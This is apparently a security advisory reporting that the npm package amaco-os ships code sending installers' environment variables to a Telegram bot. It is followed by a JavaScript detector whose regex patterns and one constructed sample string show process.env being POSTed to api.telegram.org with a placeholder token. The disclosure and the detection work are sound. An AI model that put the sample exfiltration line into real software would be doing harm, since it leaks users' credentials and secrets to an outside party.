MAL-2026-4816
Malicious code in amaco-os (npm)
Details
## Source: amazon-inspector (0a6204f29c39ab7a22921331bf33f2501b27fba9aac6a8b87b833caef9c5f506)

`dist/index.js` contains a hardcoded Telegram Bot API endpoint (https://api.telegram.org) referenced from a fetch/POST call alongside `process.env` access. The pattern (`fetch()` + POST + api.telegram.org + `process.env`) is the canonical Telegram-bot exfiltration channel used to ship installer-side environment variables (and other host data) to an attacker-controlled bot/chat. Telegram's Bot API serves as a hardcoded C2: the attacker only needs the bot token embedded in the bundle to receive every installer's data. There is no legitimate reason for an OS-themed package's bundle to POST to the Telegram Bot API while reading `process.env`.
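The four co-occurring signals named above can be checked statically in a bundle before it is installed. The following is an added example, not code from this advisory or from Amazon Inspector; the function name `scanBundle`, the verdict labels and the sample strings are assumptions constructed for illustration.

```javascript
// Added example: static check for the four signals the advisory describes
// (fetch call, POST method, api.telegram.org, process.env) in one bundle.
const SIGNALS = {
  telegramHost: /api\.telegram\.org/i,
  fetchCall: /\bfetch\s*\(/,
  postMethod: /method\s*:\s*["'`]POST["'`]/i,
  envAccess: /\bprocess\.env\b/,
};

// Returns a verdict plus the offset of the first match for each signal.
// Offsets are used instead of line numbers because bundles are often one long line.
function scanBundle(source) {
  const hits = {};
  for (const [name, re] of Object.entries(SIGNALS)) {
    const m = re.exec(source);
    if (m) hits[name] = m.index;
  }
  let verdict = "clean";
  if (Object.keys(hits).length === Object.keys(SIGNALS).length) {
    verdict = "flag";   // all four signals present: matches the advisory's pattern
  } else if ("telegramHost" in hits) {
    verdict = "review"; // Bot API host alone is unusual in a bundle, but not conclusive
  }
  return { verdict, hits };
}

// Constructed samples (not taken from the package); token and method are placeholders.
const SUSPECT =
  'const d=JSON.stringify(process.env);' +
  'fetch("https://api.telegram.org/bot<TOKEN>/<method>",{method:"POST",body:d});';
const BENIGN =
  'if(process.env.NODE_ENV!=="production"){' +
  'fetch("https://example.com/health",{method:"POST"})}';
const HOST_ONLY = "// docs: see https://api.telegram.org for the Bot API";

for (const [label, src] of Object.entries({ SUSPECT, BENIGN, HOST_ONLY })) {
  console.log(label, JSON.stringify(scanBundle(src)));
}
```

The benign sample shows why the host is the discriminating signal: `fetch`, POST and `process.env` together are common in ordinary bundles.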
Affected packages
No fixed version published yet for amaco-os (npm). Pin to a known-safe version or switch to an alternative.